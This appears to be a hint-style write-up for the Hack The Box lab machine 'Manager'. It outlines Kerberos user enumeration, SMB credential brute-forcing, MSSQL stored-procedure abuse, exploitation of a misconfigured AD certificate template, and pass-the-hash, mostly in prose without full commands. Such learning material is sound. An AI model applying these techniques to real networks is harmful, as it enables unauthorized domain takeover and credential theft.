Introduction
This section aims to provide guided support to aspiring Cyber Security learners who are learning their way around CAPTURE THE FLAG on various platforms like HackTheBox, TryHackMe, PicoCTF or HackerOne, etc.
This is not a complete walkthrough or writeup but a sneak peek into how to CAPTURE THE FLAG on these machines’ basis required attack/exploit methods and tools.
This helps the learners to take guided support meanwhile restraining them from totally depending upon the writeups and learning new skills by applying themselves.
So, let’s get started with Hack The Box platform’s machine Manager Sneak Peek.
Learnings
- Kerberos User Enumeration
- SMB Credentials Brute-Force using CrackMapExec
- MSSQL Command Execution
- Active Directory Certificate Service Exploitation
Tools Used
- Nmap
- Kerbrute
- CrackMapExec
- Impacket
- Certify
- Certipy-ad
- Evin Win-RM
Methods/Techniques
- Credentials Brute-Forcing (Dictionary Attack)
- Stored Procedure Command Execution
- Active Directory - Certification Service Custom Template Exploit
- Pass The Hash
Reference/Reading Material
- https://www.patrickkeisler.com/2012/12/how-to-use-xpdirtree-to-list-all-files-part2.html
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://www.hackthebox.com/blog/cve-2022-26923-certifried-explained
- https://github.com/ly4k/Certipy/blob/main/README.md
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
- https://www.digitalocean.com/community/tutorials/how-to-set-up-time-synchronization-on-ubuntu-20-04
Summary
We start with simple port & service enumeration and find many useful ports indicating a windows machine. We move forward with web directory enumeration but not much to avail.
How we know what to do?
With each CTF/Challenges, I keep updating my approach or you may say learning plan. I keep an excel file (for now) to remember
- What to do when I came across certain port or certain situation?
- What tools to use?
- What technique/method to apply?
So, I know basis my pervious experience that whenever I get port 88, I should try userenum using Kerbrute and when any username is found always try default "password" or password value same as username. We need to keep trying. Sometime you are luck and sometime you are not.
Might Help...
We find SMB but not able to mount anything. We move ahead with kerberos user enumeration and found some valid users.
Foothold
We have users and we can try to brute-force the credentials. I tried Hydra but due to some reason unable to make it work. We have another wonderful tool CrackMapExec and you can try a default password list to brute-force a password for the given users. (or try to be lucky)
In any case, you get two users with passwords and we also have a database port open as well in Nmap Report. If you have a client for that database you can try else Impacket also gives a client tool for this. Just try the --help with script and it gives you the way to authentication with database and give you database prompt.
User
Now, again google can help us move forward as we don't find any useful information in database then how can we exploit the database prompt. Again we know that database allow us to execute Stored Procedure, if not configured properly.
Find the stored procedure which we can execute and list the directory and search the root directory in windows for web application.
You get instersing file, just wget the file and go through contents. You will get your user credentials and once login, you have your user flag.
Root
As per our standard procedure for windows machine privilage escalation, we need to check what privileges are allowed to us.
We can one specific privilege which is related to Active Directory - Certificate Service. There is only one interesting vulnerability found on web related to same privilage and all we have to do is find the vulnerable template.
Certain certified tools can help us find the vulnerable template and some hack tricks can help further to execute our exploit.
Some Explanation and Some Cheat, your decision.
We need to list all available template and find one which is vulnerable. If you use direct vulnerable command to list the template, you may get nothing.
One specific template is vulnerable due to two reasons:
- msPKI-Certificate-Name-Flag is set to ENROLLEE_SUPPLIES_SUBJECT which means that the subject name (the identity information for the certificate holder) is expected to be supplied by the entity requesting the certificate. We are requesting and can give name administrator hence vulnerable.
- Authorized Signatures Required is set to 0. The concept of authorized signatures is related to the idea that certain certificate requests should be approved by one or more designated entities before the certificate is issued. So when it is set to 0, the certificate authority (CA) will automatically approve and issue certificates without the need for manual approval from administrators.
Pay attention so all details like DNS Hostname, CA Name and use password enclosed inside commas due to special symbol in password.
Now you have your vulnerable template, DNS hostname, CA Name and credentials and all you need to do is follow the available steps on website for this specific vulnerable template and run command as sudo.
If you follow the commands in sequence and with correct details, you shell get the administrator private certification and all you need to do is use same certified tool auth method to get the administrator hash and then Impacket will allow you do perform pass the hash attack.
You may face issue of Clock Skew
If you are facing this issue means you are in different timezone than the machine and there is big time difference between you local machine and target.
You need to synchronise the time as per target. You may use timedatectl set-ntp 0 && rdate -n <Target IP> to overcome this.
You have your admin console and root flag in front of you.
Disclaimer
The purpose of this sneak peek is just to help you to continue in the correct direction of exploiting the machine without handing you the solution directly. It helps a beginner like me to execute/explore and learn more things by ourselves while having some guidance.
Yes, it takes time but it’s worth to make an effort rather than completely depending on a full writeup.